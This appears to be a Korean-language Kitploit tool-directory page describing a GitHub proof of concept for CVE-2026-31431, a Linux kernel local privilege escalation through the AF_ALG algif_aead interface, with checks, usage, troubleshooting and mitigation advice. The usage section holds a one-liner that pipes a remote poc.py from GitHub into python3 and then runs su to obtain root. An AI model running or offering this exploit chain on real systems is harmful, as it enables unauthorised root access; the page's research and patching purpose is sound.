Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ademzero/cve-2026-31431
Privilege EscalationVulnerability AnalysisExploitationLearning & Education
GitHubademzero/cve-2026-31431

CVE-2026-31431

# Linux 커널 로컬 권한 상승 PoC (CVE-2026-31431) AF_ALG algif_aead를 통한 Linux 커널 로컬 권한 상승을 시연하는 교육용 개념 증명(PoC)입니다. 방어적 연구를 위한 사용 지침과 완화 가이드를 포함합니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-31431 - Copy Fail PoC

CVE-2026-31431(일명 Copy Fail)에 대한 교육용 Proof of Concept으로, AF_ALG / algif_aead 암호화 인터페이스와 관련된 Linux 커널 로컬 권한 상승 취약점입니다.

[!WARNING] 이 저장소는 교육, 방어 및 승인된 보안 연구 목적으로만 엄격히 제공됩니다.

소유하지 않은 시스템이나 명시적인 서면 허가 없이 테스트할 수 없는 시스템에서는 이 코드를 실행하지 마십시오.

승인되지 않은 사용은 불법일 수 있습니다.


개요

CVE-2026-31431은 커널 암호화 하위 시스템에 영향을 미치는 Linux 커널 로컬 권한 상승 취약점입니다.

이 취약점은 AF_ALG 인터페이스를 통해 노출되는 AEAD 경로와 관련이 있으며, 로컬의 권한이 없는 사용자가 읽기 가능한 파일과 연결된 페이지 캐시 데이터를 간섭하여 취약한 시스템에서 권한 상승으로 이어질 수 있습니다.

이 저장소는 통제된 실험실 환경을 위한 최소한의 교육용 Proof of Concept을 포함합니다.


요구 사항

대상 시스템은 필요한 AF_ALG AEAD 알고리즘을 노출해야 합니다.

다음 명령으로 확인할 수 있습니다:

root@kitploit:~
grep -i "authencesn\|authenc" /proc/crypto

PoC는 다음과 유사한 알고리즘에 대한 지원을 기대합니다:

root@kitploit:~
authencesn(hmac(sha256),cbc(aes))

알고리즘을 사용할 수 없는 경우 PoC는 다음과 같은 오류와 함께 실패할 수 있습니다:

root@kitploit:~
FileNotFoundError: [Errno 2] No such file or directory

이는 필요한 커널 암호화 알고리즘이 시스템에서 사용 가능하지 않음을 의미합니다.


사용법

저장소를 클론합니다:

root@kitploit:~
git clone https://github.com/Karim33z/CVE-2026-31431.git
cd CVE-2026-31431

PoC를 실행합니다:

root@kitploit:~
python3 poc.py

또는 직접 실행합니다:

root@kitploit:~
curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su

호환성 참고 사항

일부 Linux 시스템은 /usr/bin/su 대신 /bin/su를 사용합니다. 올바른 경로는 다음 명령으로 확인할 수 있습니다:

root@kitploit:~
which su

필요한 경우 poc.py 내부의 대상 경로를 조정하십시오.


문제 해결

AEAD 알고리즘 누락

authencesn(hmac(sha256),cbc(aes))에 바인딩하는 동안 FileNotFoundError: [Errno 2] No such file or directory 오류가 발생하면 필요한 커널 알고리즘을 사용할 수 없는 것입니다.

사용 가능한 암호화 알고리즘을 확인합니다:

root@kitploit:~
cat /proc/crypto

또는 더 구체적으로:

root@kitploit:~
grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto

잘못된 su 경로

PoC가 /usr/bin/su를 참조하지만 시스템이 /bin/su를 사용하는 경우 다음으로 확인합니다:

root@kitploit:~
which su

그런 다음 poc.py의 경로를 그에 맞게 업데이트하십시오.


완화

방어자는 배포판 공급업체가 제공하는 패치된 Linux 커널 버전으로 업데이트해야 합니다.

커널을 업데이트한 후 시스템을 재부팅하여 패치된 커널이 활성화되었는지 확인하십시오.

임시 완화 조치에는 환경 및 배포판에 따라 영향을 받는 커널 암호화 기능에 대한 액세스 제한이 포함될 수 있습니다.


법적 고지

이 프로젝트는 다음 목적으로만 제공됩니다:

  • 보안 연구
  • 방어적 검증
  • 교육 목적
  • 승인된 실험실 테스트

저자는 이 코드로 인한 오용, 손해 또는 불법 활동에 대해 책임을 지지 않습니다.

명시적 승인이 있는 시스템에서만 사용하십시오.


라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.

도구 다운로드